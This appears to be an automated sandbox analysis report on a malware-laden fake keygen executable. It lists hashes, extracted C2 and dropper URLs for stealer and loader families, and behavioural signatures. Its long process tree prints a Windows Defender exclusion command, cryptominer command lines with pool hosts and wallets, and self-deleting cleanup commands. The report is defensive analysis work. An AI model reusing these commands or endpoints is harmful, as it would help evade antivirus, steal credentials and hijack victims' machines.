Analysis
-
max time kernel
568s -
max time network
1782s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:55
General
-
Target
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
-
Size
5.2MB
-
MD5
9e12e3e503674039878cb7542a30f33c
-
SHA1
789b75006358e62cff26877e4fc5fdd31f7e8a76
-
SHA256
714b89115f9f4b3979e2f70ad6eb9e7d81fbcd8a8c984d7271adf01c8ecbcd36
-
SHA512
0091f4b40a06cadb0e12f1066dcb2c79a0ffa60bcc873761751e3f7feb85e30a38ba29cbbb29f3f32fa810236055044978533186942c07d0070e64b3e4dac544
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://labsclub.com/welcome
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
smokeloader
Version
2020
C2
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Botnet
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
Attributes
-
url4cnc
https://tttttt.me/hobamantfr1
rc4.plain
rc4.plain
Extracted
Family
raccoon
Botnet
afefd33a49c7cbd55d417545269920f24c85aa37
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 8 IoCs
-
Blocklisted process makes network request 17 IoCs
-
Drops file in Drivers directory 5 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 19 IoCs
-
Checks for any installed AV software in registry 1 TTPs 64 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 7 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 21 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 42 IoCs
-
Suspicious use of SetThreadContext 18 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 45 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 6 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 9 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Runs ping.exe 1 TTPs 5 IoCs
-
Script User-Agent 48 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 21 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe"C:\Users\Admin\AppData\Local\Temp\Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe" 1 3.1617537381.6069a9656ec0a 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4G0S6ZSZGF\multitimer.exe" 2 3.1617537381.6069a9656ec0a7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\vkirkc44ft0\dteryuxm5so.exe"C:\Users\Admin\AppData\Local\Temp\vkirkc44ft0\dteryuxm5so.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dteryuxm5so.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vkirkc44ft0\dteryuxm5so.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dteryuxm5so.exe" /f10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\t1bmtbbse0y\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\t1bmtbbse0y\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-LFDHT.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-LFDHT.tmp\Setup3310.tmp" /SL5="$1031A,138429,56832,C:\Users\Admin\AppData\Local\Temp\t1bmtbbse0y\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-PKHJB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PKHJB.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 94812⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 100812⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 101612⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 117612⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 119212⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 120812⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 151212⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 156412⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 157612⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 176812⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 184412⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 183612⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-7CU35.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-7CU35.tmp\LabPicV3.tmp" /SL5="$203AE,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-Q630G.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-Q630G.tmp\ppppppfy.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Sidebar\WFHQQRLPVR\prolab.exe"C:\Program Files\Windows Sidebar\WFHQQRLPVR\prolab.exe" /VERYSILENT14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-UQBLM.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-UQBLM.tmp\prolab.tmp" /SL5="$20276,575243,216576,C:\Program Files\Windows Sidebar\WFHQQRLPVR\prolab.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\f4-5b61b-794-f828a-51224a3ffa445\Fumeqifise.exe"C:\Users\Admin\AppData\Local\Temp\f4-5b61b-794-f828a-51224a3ffa445\Fumeqifise.exe"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ivgaigu.yhr\md6_6ydj.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\5ivgaigu.yhr\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\5ivgaigu.yhr\md6_6ydj.exe16⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rs2y1zci.nua\askinstall31.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\rs2y1zci.nua\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\rs2y1zci.nua\askinstall31.exe16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exe16⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\wugt3w4h.aoz\toolspab1.exe17⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qxnlz3e4.04c\GcleanerWW.exe /mixone & exit15⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\itjpn0sl.vmk\setup_10.2_mix.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\itjpn0sl.vmk\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\itjpn0sl.vmk\setup_10.2_mix.exe16⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m0b1eboy.ufl\file.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\m0b1eboy.ufl\file.exeC:\Users\Admin\AppData\Local\Temp\m0b1eboy.ufl\file.exe16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe" 1 3.1617537651.6069aa73329d5 10119⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1KCU8FXJN8\multitimer.exe" 2 3.1617537651.6069aa73329d520⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\0jtvurl4wn1\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\0jtvurl4wn1\cpyrix.exe" /VERYSILENT21⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5e441c5f-59e3-4ba9-b1da-1a24280ec78a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5e441c5f-59e3-4ba9-b1da-1a24280ec78a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5e441c5f-59e3-4ba9-b1da-1a24280ec78a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5e441c5f-59e3-4ba9-b1da-1a24280ec78a\test.bat"24⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV124⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qditsxdj5pd\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\qditsxdj5pd\Setup3310.exe" /Verysilent /subid=57721⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8SQK9.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-8SQK9.tmp\Setup3310.tmp" /SL5="$30690,138429,56832,C:\Users\Admin\AppData\Local\Temp\qditsxdj5pd\Setup3310.exe" /Verysilent /subid=57722⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PAS12.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PAS12.tmp\Setup.exe" /Verysilent23⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kcl5lx3txad\awqz0osyxp5.exe"C:\Users\Admin\AppData\Local\Temp\kcl5lx3txad\awqz0osyxp5.exe" /ustwo INSTALL21⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "awqz0osyxp5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kcl5lx3txad\awqz0osyxp5.exe" & exit22⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "awqz0osyxp5.exe" /f23⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\j4rzlf2zrsx\app.exe"C:\Users\Admin\AppData\Local\Temp\j4rzlf2zrsx\app.exe" /8-2321⤵
-
-
C:\Users\Admin\AppData\Local\Temp\wzrvret2gv1\vict.exe"C:\Users\Admin\AppData\Local\Temp\wzrvret2gv1\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JL95N.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-JL95N.tmp\vict.tmp" /SL5="$405E0,870426,780800,C:\Users\Admin\AppData\Local\Temp\wzrvret2gv1\vict.exe" /VERYSILENT /id=53522⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OJ4K9.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-OJ4K9.tmp\win1host.exe" 53523⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\G853KSTUVC\setups.exe"C:\Users\Admin\AppData\Local\Temp\G853KSTUVC\setups.exe" ll18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-C7CBE.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-C7CBE.tmp\setups.tmp" /SL5="$A059E,454998,229376,C:\Users\Admin\AppData\Local\Temp\G853KSTUVC\setups.exe" ll19⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"17⤵
- Drops file in Program Files directory
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵
-
C:\Users\Admin\AppData\Roaming\CEFA.tmp.exe"C:\Users\Admin\AppData\Roaming\CEFA.tmp.exe"18⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵
- Blocklisted process makes network request
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Roaming\DDA1.tmp.exe"C:\Users\Admin\AppData\Roaming\DDA1.tmp.exe"18⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵
- Checks whether UAC is enabled
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exe /8-2222 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exeC:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exe /8-222216⤵
-
C:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exe"C:\Users\Admin\AppData\Local\Temp\i0z0lr0n.q42\app.exe" /8-222217⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rastiva1.tjj\Four.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\rastiva1.tjj\Four.exeC:\Users\Admin\AppData\Local\Temp\rastiva1.tjj\Four.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe" 1 3.1617537699.6069aaa350250 10418⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\EMYCRSI2IH\multitimer.exe" 2 3.1617537699.6069aaa35025019⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\q1ub213rf3e\ckv5eewanrr.exe"C:\Users\Admin\AppData\Local\Temp\q1ub213rf3e\ckv5eewanrr.exe" /ustwo INSTALL20⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ckv5eewanrr.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\q1ub213rf3e\ckv5eewanrr.exe" & exit21⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵
-
-
